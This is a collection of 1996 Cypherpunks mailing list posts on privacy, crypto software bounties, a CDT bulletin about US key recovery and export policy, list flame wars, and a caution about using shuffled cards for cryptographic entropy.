They got him on hidden video apperently photocopying documents
that he intended to pass along.


Tim

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 18 Nov 1996 14:13:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
Message-ID: <3.0b36.32.19961118170415.006a7b98@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:57 AM 11/18/96 -0800, Huge Cajones Remailer wrote:
>
>At 8:38 PM 11/17/1996, Huge Cajones Remailer wrote:
>>> Privacy is a hassle.  Is it worth it?
>>> 
>>> Which unfortunate situations does privacy prevent?  What are the odds
>>> that they will occur?  How much effort will it take to prevent these
>>> outcomes?  As a model, use the present and future situation of a
>>> typical reader of this list.

Risks of not employing privacy techniques:

1)	You might have to pay 30%+ of your income in taxes.
2)	Your driver's license might be capable of being suspended.
3)	Your children will be more likely to be grabbed by Child Protective
Services.
4)	You are *much* more likely to come to the attention of the authorities.
5)	Your usenet posts on gun control may be reported to the local sheriff's
office and an armed agent of the state may call you.
6)	You may be dunned by debt collectors.
7)	Your property will be at greater risk of forfeiture to the government or
loss to private litigation.
8)	You may have to pay thousands of dollars a year in auto insurance.
9)	You are more likely to lose a job because of something your employer
finds out about you.
10)	If you live in a "non-attainment area" your older car may fail
emissions inspection.

That's all for now.  I've got a million of them.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Mon, 18 Nov 1996 17:28:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
Message-ID: <199611190128.RAA29725@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 2:10 PM 11/18/1996, Sandy Sandfort wrote:
>Note in the following exchange that HC firsts asks for examples
>of harm, then when clearly unambiguous examples are given, tries 
>to imply that the examples are rare, trivial or (most amazingly)
>that the victim did suffer, but must have deserved his/her fate!

You are building a straw man.  Nobody has been said to deserve their
fate.  Their fates appear to be unlikely events.

Contrary to what several privacy advocates have implied, I am not
claiming that people should not be allowed to protect their privacy.
Nor am I claiming that people who protect their privacy are criminals.

I am asking why I should protect my privacy.  Most people have
concluded that it is not worth the bother.  Why are they wrong?

(And, why are privacy advocates uniformly hostile to these questions?
Because they are asked anonymously?)

>> BTW, are you operating under your True Name?
>
>NOYB.

Fair enough.

>More importantly, since you seem to think privacy isn't
>all that important why don't you give us your true name, date of
>birth, SS#, mother's maiden name, address where you sleep at 
>night, pictures of you (and your family), etc.?  After all, as 
>you wrote, the "odds are low" anything will come of it.

Who me?  No way!  :-)

HC






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 18 Nov 1996 17:54:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Crypto Bounties: Another Thought that crossed my mind.
Message-ID: <v02140b00aeb671969014@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


[snip]
Ian Grigg <iang@systemics.com> wrote:
>In order to overcome project failure, I could write my contract as a
>multi-supplier seed project (often done by governments).  That is, the
>pot gets shared around, say, the three best alternatives.  Once
>supplied, all are free to pick from the alternatives.
>
>In order to overcome the low silly bid, somehow reputation would have to
>be built into the market.  That is, your efforts in the past as
>programmer will cause your solution to be better valued than mine.

Why not the free market rate the programmers.  Have a software
distribution/payment collection system which requires that the programmer
get a completion bond from a 3rd-part insurance company.  If the programmer
fails to deliver as promised and/or on-time the donding company pays the
'investors' back in full. Since the bonding company's money would be at
risk, if the programmer failed to deliver, they have every incentive to
conservatively rate the programmers/companies offering ot build SW to spec.

[snip]
>There's a lot of aspects of newbies and switching funds that I havn't
>really thought through here.  However, I like this viewpoint because it
>eliminates the need for judges.  History shows that a good market
>microstructure will beat an authority approach in the long run.
>
>Also note that if you drop the free software assumption, and make it,
>say, moneyware, then the market becomes much more workable - the asset
>being traded is a share of future revenues.  This has more ramifications
>than might be obvious:  Propose a market to write a GAK killer for
>e$10,000.  If it clears and is built, is the Dept. of Justice forced to
>buy the rights out?
>
>> Has anything like this been proposed before?

Yes, Eric Hughes proposed a broad and structured proposal primarily
addressing this manner of market funding for software development (and
possibly suitable for other intellectual property creation) at DEFCON IV.
My previous comments on completion bonds were taken from his presentation.

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 18 Nov 1996 14:55:04 -0800 (PST)
To: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Subject: Re: Cpunks Frog Forwards discontinuation
In-Reply-To: <199611181437.JAA22942@yakko.cs.wmich.edu>
Message-ID: <Pine.SUN.3.91.961118175548.23329A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Nov 1996, Damaged Justice wrote:

>  o Ray Arachelian runs a free filtering service, sticking mostly to news
>    and technical stuff with a few other tidbits thrown in. Mail
>  
>    sunder@dorsai.dorsai.org


This has been moved to sunder@sundernet.com (hosted via brainlink, the 
fascist dorsai account is no more.)

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Randal Schwartz <merlyn@stonehenge.com>
Date: Mon, 18 Nov 1996 16:57:39 -0800 (PST)
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: LACC: BayLISA: Randal Schwartz, Just Another Convicted Perl Hacker (fwd)
In-Reply-To: <Pine.GUL.3.95.961117210230.15571A-100000@Networking.Stanford.EDU>
Message-ID: <8cpw1a9a1c.fsf@gadget.cscaper.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Rich" == Rich Graves <llurch@networking.stanford.edu> writes:

Rich> This should be QUITE entertaining.

Well, it's not like I juggle or anything. :-)

-- 
Name: Randal L. Schwartz / Stonehenge Consulting Services (503)777-0095
Keywords: Perl training, UNIX[tm] consulting, video production, skiing, flying
Email: <merlyn@stonehenge.com> Snail: (Call) PGP-Key: (finger merlyn@ora.com)
Web: My Home Page!
Quote: "I'm telling you, if I could have five lines in my .sig, I would!" -- me




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Grigg <iang@systemics.com>
Date: Mon, 18 Nov 1996 09:12:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Crypto Bounties: Another Thought that crossed my mind.
In-Reply-To: <199611172011.PAA17213@alpha.pair.com>
Message-ID: <3290992F.2781E494@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


snow@smoke.suba.com said:
>       Well, I was thinking, what if a "Crypto Software Bounty Server"
>  were set up, so that someone could propose a tool that they would like
>  to see, along with an initial bounty. Others could contribute toward that
>  bounty (anonymously if they wish) until either the tool was delivered.
> 
>       The original issuer sets standards for the software (i.e. "easy to
>  use interface to mixmaster remailers for Macintosh", then must define
>  easy to use; Software considered delivered when in [alpha beta late-beta
>  &etc.]). The first to present software meeting these qualifications gets
>  the bounty, with the caviate that the software must be either gnu-copylefted,
>  or some similar "free use" copyright, after all, "The Net" paid for it...

Hmmm.  This is a one shot game (is that the term?) whereas software
generally has implications that escape a single sale scenario.  For
example, the more difficult the software, the more risk there is that
someone else will beat you, thus lowering the real risk-adjusted payoff
dramatically.   For this reason, more complex stuff would need some sort
of contract+reputation scenario that allows a repeating game to work.

A contractual alternative could work like this.  I (the initial desirer)
write a contract specifying my requirements.  I publish this as a market
tender, where other desirers can contribute funds, and this becomes a
cumulative sum that grows.  Programmers can offer to supply by naming a
price.  The market clears when the pot of desire equals or exceeds the
lowest offer to supply.

In a simplistic scenario, the contract is now sealed and the work is
done and paid for.

In order to overcome project failure, I could write my contract as a
multi-supplier seed project (often done by governments).  That is, the
pot gets shared around, say, the three best alternatives.  Once
supplied, all are free to pick from the alternatives.

In order to overcome the low silly bid, somehow reputation would have to
be built into the market.  That is, your efforts in the past as
programmer will cause your solution to be better valued than mine.

So perhaps we should turn this around.  Programmers would write
contracts to supply the given requirements at clearance+T, also
specifying the clearance price.  Your price is 2000 for the widget, mine
is 1000.  (That makes three contracts, a widget spec, my work plan and
your work plan.)  The market (the desirers) would then push funds back
and forth between the two until it became clear that one or the other
cleared.  As more pressure increases, more funds pour in.

Then, deliverables could be phased, with monies similarly phased, so
that the market has a chance to monitor.  Now, if it is not delivered,
reputation suffers, and you have to lower your price for the next job
(or hide in shame).

There's a lot of aspects of newbies and switching funds that I havn't
really thought through here.  However, I like this viewpoint because it
eliminates the need for judges.  History shows that a good market
microstructure will beat an authority approach in the long run.

Also note that if you drop the free software assumption, and make it,
say, moneyware, then the market becomes much more workable - the asset
being traded is a share of future revenues.  This has more ramifications
than might be obvious:  Propose a market to write a GAK killer for
e$10,000.  If it clears and is built, is the Dept. of Justice forced to
buy the rights out?

> Has anything like this been proposed before?

I don't know if this has been proposed before, but it is a logical
conclusion of the CP world.  If the Internet transaction costs make
single-person economic entities the most efficient unit in the machine,
and e$ in all its forms provides the oil, then we need some way to
connect up the parts for grand projects where there are hard cash
incentives.  There has to be some mechanism to distribute that cash in
the most efficient manner to produce the result.

BTW, this is a here and now issue, not a hypothetical future.  We have
already found that there is too much work on our plate, and limited
efficiency in farming it out.  Others may have found the same.

-- 
iang
iang@systemics.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 18 Nov 1996 18:15:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Taking out the garbage
Message-ID: <Pine.3.89.9611181823.A3117-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


Beginning Monday, 11/25/96, I will bounce all email from the various 
(non-)subscribers polluting this list with garbage back to the 
authors. Furthermore, I will attach documents describing basic 
Internet rules of conduct to each bounce.

I would encourage other Cypherpunks to do the same. 

[Flames: /dev/null.]
-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryondp@aol.com
Date: Mon, 18 Nov 1996 15:42:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: POC_ket
Message-ID: <961118184128_1083259824@emout08.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Take me off the list!!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Palacios <editor@cdt.org>
Date: Mon, 18 Nov 1996 15:53:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.38 - President Takes First Steps TowardsClipper 3.1.1
Message-ID: <v03007803aeb6a50ea233@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 38
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 38                     November 18, 1996

 CONTENTS: (1) President Takes First Steps Towards Clipper 3.1.1
           (2) Details of the Executive Order
           (3) How to Subscribe/Unsubscribe
           (4) About CDT, contacting us

  ** This document may be redistributed freely with this banner intact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
         ** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

(1) PRESIDENT TAKES FIRST STEPS TOWARDS CLIPPER 3.1.1

In a move that leaves major unanswered questions about the privacy of global
communications on the Internet,  President Clinton has taken the first
concrete steps towards implementing the government's controversial key
recovery encryption proposal.  On Friday November 15, the President appointed
an ambassador-level "Special Envoy for Cryptography" and signed an Executive
Order that gives the Commerce Department jurisdiction over encryption exports
but includes the Justice Department in all such export decisions.  These
developments do little to change the underlying regulations on encryption
that have prevented the development of a strong worldwide encryption standard
needed to protect privacy and security on the Internet.

The full text of the executive order and other relevant background materials
are available on CDT's Encryption Policy Page:

     http://www.cdt.org/crypto/

Friday's White House announcements demonstrate the Administration's
commitment to its dangerous key recovery approach to worldwide encryption.
This approach fails to meet the fundamental privacy needs of computer users
and industry because:

*  International communications are still vulnerable since products sold
   by the dominant U.S. hardware and software manufacturers must conform
   to U.S. export controls.

*  Key recovery won't protect privacy internationally and institutionalizes
   a global government surveillance mechanism without privacy safeguards.

*  U.S. exports are still controlled and uncompetitive making it harder for
   the market to develop a secure global encryption standard.

The Administration policy, initially announced on October 1st and dubbed
"Clipper 3.1.1," leaves Internet users without the technical means to secure
their communications or the international legal standards needed to protect
their privacy.

In other developments this week, Hewlett-Packard and other companies announced
preliminary approval to export new "dormant encryption" products, which
contain strong encryption that can only be activated with a special license.
While this new architecture is expected to make it easier for industry to
market encryption products, this technology does not change the underlying
privacy problems created by the Administration's export control policy.
Granting of licenses to use strong encryption will still be subject to the
current export controls limiting key length and requiring key recovery for
strong encryption.

CONTINUING A DANGEROUS KEY RECOVERY POLICY

The Administration's announcements mark the first real steps towards
implementing an approach to encryption policy based on the dangerous and
untested idea of global key recovery.  This approach would institutionalize
worldwide governmental access to encrypted communications without providing
any privacy standards for electronic communications or stored data.

The Administration's approach leaves computer users at risk operating on a
global network without the technical security provided by strong encryption
or the legal privacy rights afforded here in the United States by the Fourth
Amendment and federal law.  For example, the Administration policy would not
solve the following privacy problems:

*  International communications are still vulnerable.  For example, an
   American individual doing business with someone in France would still
   be forced to use weaker forms of encryption, or use key recovery systems
   that make their communications accessible to law enforcement officials of
   both countries.

*  Key recovery won't protect privacy internationally.  A Chinese dissident
   communicating with supporters in the U.S. and fearful of weaker encryption
   would be to forced to use key recovery. The Administration indicates that
   such key recovery mechanisms would be based on bilateral key-access
   arrangements between governments. Even if the dissident's keys were
   recoverable only in the U.S., such a global key access policy would
   almost certainly make those keys accessible to the Chinese government. If
   the United States expects China to assist U.S. law enforcement with key
   recovery for issues of national interest, such as anti-piracy efforts in
   China, we can also expect China to require U.S. disclosure of keys to its
   law enforcement community.

*  Exports are still controlled and uncompetitive.  A Japanese company using
   exportable U.S. encryption products would be forced to use lower strength
   encryption -- or use an key recovery agent approved by the U.S. law
   enforcement community. This is unlikely to help the global market develop
   a worldwide standard for secure communications.

As a result of this policy, computer users all over the world will be left
with a lowest common denominator infrastructure that does not provide for
either technical security or legal privacy for sensitive communications and
data. CDT believes that any workable U.S. encryption policy must be designed
to protect the privacy and security of Internet users.

------------------------------------------------------------------------

(2) DETAILS OF THE EXECUTIVE ORDER

The Executive Order signed by the President on Friday does not change the
type of encryption products that will be exportable. Rather, it lays the
groundwork for the eventual transfer of encryption export control
jurisdiction from the State Department to the Commerce Department pending
Final Regulations by both departments.

Encryption exports have traditionally been regulated as "munitions"
controlled by the State Department. While the Commerce Department is widely
viewed as more sensitive to the needs of business and individual encryption
users, Commerce is still constrained by Administration encryption policy.
Additional provisions of the Executive Order indicate that the Commerce
Department's encryption controls will continue to be dominated by law
enforcement and national security interests:

*  New Justice Department role in export review committee -- In an unusual
   step, the Order adds the Justice Department to the interagency group
   reviewing Commerce encryption export decisions.

*  Source code treated as a "product" -- The Order specifically singles out
   encryption source code to be given the stricter review scrutiny of a
   "product" rather than a "technology."

*  Broad definition of export -- The export of encryption source code or
   object code is extended to explicitly include posting to FTP sites or
   electronic bulletin boards unless "adequate" precautions are taken to
   prevent transfer abroad. As reflected by a recent Federal Court finding
   in the CDA indecency case that Internet users rarely have control over
   the parties accessing materials via FTP, Usenet, or the Web, this
   provision could have the chilling effect of preventing most
   dissemination or discussion of new cryptographic tools on the Internet.

The Administration's announcements will have little effect on the existing
encryption privacy problem unless the underlying policies governing the
export and use of encryption are changed. These announcements do little to
address the unanswered questions about how privacy will be protected in the
key recovery system envisioned by the Administration.

APPOINTMENT OF THE "SPECIAL ENVOY FOR CRYPTOGRAPHY"

On Friday the President also designated Ambassador David L. Aaron as the
new "Special Envoy for Cryptography."  According to the White House, this
Special Envoy will have "responsibility to promote the growth of electronic
commerce and robust, secure global communications in a manner that protects
the public safety and national security. . . . Ambassador Aaron will promote
international cooperation, coordinate U.S. contacts with foreign governments
on encryption matters and provide a focal point for identifying and resolving
bilateral and multilateral encryption issues."  Ambassador Aaron is currently
the U.S. Ambassador to the OECD.

CDT hopes that the new Special Envoy, as a representative of the United
States, will work to represent the needs of Americans to communicate
privately in the currently insecure global environment.  Until now, U.S.
encryption representation abroad has been dominated by law enforcement and
national security interests. CDT hopes that the new Special Envoy will also
consult with the computer user community, consumers, privacy advocates, and
industry to promote their need for secure networks worldwide.

NEXT STEPS

In the coming months, both the Department of Commerce and the State
Department must issue rules to implement the Administration's new encryption
policy.

*  The State Department will issue a rule transferring its jurisdiction of
   encryption licensing  to the Commerce Department.

*  The Commerce Department will issue rules spelling out exactly how it will
   approve products for export, and what the requirements for approved key
   recovery centers and key recovery plans will look like.

CDT hopes and expects that the Administration will provide an opportunity
for public comment in the rulemaking process to allow input from those
concerned about privacy and security in the formulation of U.S. encryption
policy.

------------------------------------------------------------------------

(3) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
nearly 10,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------

(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.38                                           11/18/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 18 Nov 1996 15:55:34 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: The Utility of Privacy
In-Reply-To: <Pine.SUN.3.91.961118063411.10538D-100000@crl8.crl.com>
Message-ID: <Pine.SUN.3.94.961118185330.29557A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Nov 1996, Sandy Sandfort wrote:

> The problem with having a whole lot of private information about
> you floating around in public is not what damage it can do to you
> now, but rather the problems it potentially could cause in the
> future.  Just about everyone on this list has been to university.
> Not long ago, a college education was essentially a death warrant 
> in Cambodia.  Prior to that, a degree was considered a good thing
> there.  People saw no reason to hid the fact that they had been
> in school.  Trouble is, things changed.

Oh, come on.  That could never happen here.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Mon, 18 Nov 1996 18:03:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: POC_ket
In-Reply-To: <1.5.4.32.19961118164214.006e9e00@pop.pipeline.com>
Message-ID: <lvpw1au9je.fsf@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

jya@pipeline.com (John Young) writes:

> 
> WaJo reports today on IBM's tiny pocket computer that
> transmits data through the body -- to another body or to
> a device such as a telephone. Invented by Tom Zimmerman,
> formerly of the Media Lab, it can tell "anything you touch
> who you are." Being shown at Comdex.
> 
> The body as a token. How to crack a human? Grab and 
> squeeze out a pass phrase.


this particular paragraph certainly brought some ideas to my head: 

	Among other uses, Mr. Zimmerman says his setup could create
	a "personal area network" over one's body to link the
	various electronic devices a person carries. For instance,
	it could allow a pager attached to one's belt to transmit
	a phone number it receives to a cellular phone carried in
	a pocket. The researcher even imagines a version of the
	small computers that could be built into shoes, with the
	electricity to power them being generated by a person's
	steps.

talk about an opportunity for sniffing data off someone or just
pouring your data own into their 'personal network'.  this is the
'denial of existence' attack - the computer cannot talk to you - you
don't exist...

- -pjf
- -- 
"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)
			  finger for PGP key
zifi runs LINUX 2.1.9  -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMpEVLU3Qo/lG0AH5AQF91QP7Bq++q50LIvJ75f5MKPuifHgdO9OKZ7Kz
tYRo7YupZrTvhuCF/FO3UBf8l2QJuEPaBXvy8QSGXU/iEi/arBsNQ3o7jZnUKr5V
KAaWNM5qaFc596T3acTHu7ESi6/SYt3/8utdjcSl/a4MhrvVlxqYtQCzkGI3r3W2
IGo8ah5MVmw=
=CMX6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: se7en <se7en@dis.org>
Date: Mon, 18 Nov 1996 18:41:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Digests
Message-ID: <Pine.BSI.3.91.961118190307.11292C-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



Well, I finally finished all of them, and they are all currently on-line 
and up-to-date. If anyone ever takes on a similar project, I have some 
advice: don't ever let yourself get behind!

http://www.dis.org/se7en/

under the dc weekly digests section

se7en





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Boursy <boursy@earthlink.net>
Date: Mon, 18 Nov 1996 16:08:33 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Fuck You Dumb Cunt
In-Reply-To: <199611182134.NAA08552@kachina.jetcafe.org>
Message-ID: <3290FB1C.474C@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Dave Hayes wrote:
> 
> Brian Davis writes:
>
>> I'm especially sorry that some of you don't believe in property
>> rights.
> 
> I believe in them, alright. It's just that they seem to be at odds
> with freedom of speech.
> 
> They are at odds with a lot of other things as well, but that's
> a different fla...er...discussion.


  I believe the posession of property is a priv. to be taken 
away if abused.  There is no such thing as a 'right' to 
property--in fact the very notion seems absurd.

                        Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Boursy <boursy@earthlink.net>
Date: Mon, 18 Nov 1996 16:21:50 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
In-Reply-To: <199611171100.JAA21839@prometheus.hol.gr>
Message-ID: <3290FE56.2479@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


George A. Stathis wrote:
> 
> At 12:07 ðì 17/11/1996 -0600, snow wrote:
>>
>>    Boursy is a twit who has lost more accounts that Vulis.


  I've lost but one account--world.std.com (Software Tool &
Die) soon to be purchased by the conglomorate Plug Pullers
R US.  That was entirely related to a local rent control
matter.  Now I may be a 'twit'--that is an entirely
different matter.

 
> I would suggest that it is not at all a "safe" indication of personal
> or intellectual _worth_, (of Mr. Boursy or of anyone) "how many
> accounts he has lost".

   I would say though that if one makes false statements as has
this 'snow' character it indicates a lack of credibiltiy.

 
>>    Ignore him.

  Something you seem unable to do.  Isn't it odd how some will
tell you how insignificant and irrelevant you are only to devote
so much of their time and energy to you.  I find that very odd.

 
> It is not ethical to send such strong negative _injunctions_ to masses
> of people and also to strangers (the 1900-strong members of the cyberphunks
> list for instance). 

  Well thanks George but I do think his statement speak for themselves.
I'm not in the least concerned someone like him could harm me--in fact
I find it very amusing that he is deemed 'acceptable for that list
while Dr. Vulis is not.

> Because, you may or may not have strong reasons for
> believing you are justified in such invalidation, but more than a 1000
> people are now _told_ by (self-appointed) "experts" such as yourself what
> and whom to ignore or to believe. (Like sheep led to the slaughter)...


   Well that's sort of like Tiny Tim Skirvin and his Global Killfile--
it does him more harm than those he is after--in fact little Tim reads
my every word.

 
> But what you are doing now, extending the "1-person-blacklist" to your
> number-two-entry (Mr. Boursy) is exactly the thing that I hoped you might
> avoid.

  And based on lies as well--I've only had one account terminated--that
by Barry Shein who lives in Brookline, Ma. and that was entirely do
to real estate industry money and the rent control issue (a statewide
referrendum on rent control which existed only in Brookline, Cambridge,
and Boston)--many millions of dollars at stake there.  Shein is simply
a whore.
 
>         First they kicked out Dimitri Vulis.
> 
>         Then they slandered and kept out Steve Boursy.

  Well my suggestion--given the size of the list and that we have
numerous sympathizers there--is to have all of their posts forwarded
and publically post them for free and open discussion.

                            Steve


> 
>         Then...
> 
>         When they came after me, there was nobody left to support me.
> 
> (You can perhaps realize what this paraphrase is about)... :-(
> 
> Sincerily, and with... Sanity of Mind :-)
> George Stathis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 18 Nov 1996 17:01:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Taxation Thought Experiment
In-Reply-To: <199611180235.UAA00791@manifold.algebra.com>
Message-ID: <gF8LXD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> Dr.Dimitri Vulis KOTM wrote:
> > ichudov@algebra.com (Igor "FUCK MNE HARDER" Chudov @ home) writes:
> > > Dr.Dimitri Vulis KOTM wrote:
> > > > Therefore it's sometimes more profitable for a company to raise money b
> > > > issuing bonds (debt) and paying tax-deducuble interest than by selling
> > > > stock (equity) and paying non-decuctible dividentds to stockholders.
> > > There is, in fact, a neat theorem that says that (*_under certain
> > > assumptions_*) the value of a firm does not depend on its capital
> > > structure.
> >
> > Igor, you begin to sound just like Timmy May - talking about things you kno
> > nothing about.
>
> Surely I know nothing about finance. Never claimed otherwise.

Then I suggest that you get hold of an undergraduate book on corporate finance,
such as Ross, Westerfield, Jordan, from Irwin. They just came out with the 3rd
edition). Read their very lucid explanation of M&M's work, and in particular
what they mean by "bankrupcy costs". Sure beats quoting academic papers that
you don't understand.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Mon, 18 Nov 1996 20:01:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Playing Cards - Caution!
Message-ID: <v02140b00aeb6e056bb78@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


A few days ago I suggested that playing cards are a good source
of entropy.  This was based on claim by Persi Diaconis which
was quoted in The Economist.

I've researched the claim and I now believe it would be wise not to
use playing cards as a source of entropy for cryptographic
applications.

A fully random deck of 52 cards has about 225 bits of entropy.  That
means that each riffle shuffle introduces about 32 bits of entropy.
Intuitively, that seems like a lot of entropy for one riffle shuffle.
I've tried a few riffle shuffles with a sorted deck.  While hardly
scientific, the level of randomness does not look like 32 bits.  Most
of the time the cards alternate.

The claim that 7 riffle shuffles of a deck of 52 cards will bring
the deck to a state of near randomness appears in this book:

Diaconis, Persi "Group Representations in Probability and Statistics"
Hayward, California: Institute of Mathematical Statistics, 1988.
ISBN 0-940600-14-5

The section "An Analysis of Real Riffle Shuffles" begins on page 77.

A model is presented which Diaconis believes is similar to how people
shuffle in real life.  What is troubling from a cryptographic point of
view is that there is little empirical evidence to back this up.  What
is more, Diaconis mentions that there is some variation in shufflers.
A neat shuffler will be less random.  (Side note: The Economist claims
Diaconis can execute 8 perfect shuffles in less than a minute.  This
means the deck is returned to its original order!)

>From the point of view of cryptography, neatness is not a very precise
term and should not be relied upon.

The book says that in the late 1960s, tournament bridge players
started using computers (!) to shuffle the cards as hand shuffling was
considered suspect.  This is less than reassuring.

Nothing I have written here is intended to reflect poorly on Dr.
Diaconis.  We were not solving the same problem, nor have I fully
understood his work.

In my first article I said this:

"Playing cards are a nice source of randomness because they are widely
available and their behavior has been under study for a long time by
people with strong financial reasons for finding flaws.  I slightly
prefer cards to dice because dice may be slightly predictable or even
loaded."

The study of randomness in cards looks much harder to me now.  Also,
flaws which may be exploitable for financial reasons when real money
is on the table may have to be substantially more dramatic than the
flaws required to exploit, for instance, an alleged one-time pad.

Here's why I now prefer dice: Dice are simple.  Each die throw can be
made to be quite independent of all other die throws.  Even loaded dice
may be used by throwing them repeatedly and adding the results mod the
number of sides to the die.  Dice which are suspect may be studied by
repeated throwing.  Non-independence can be more easily studied as
it can be assumed that a throw of the die is, at most, related only
to the previous throw and none before.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
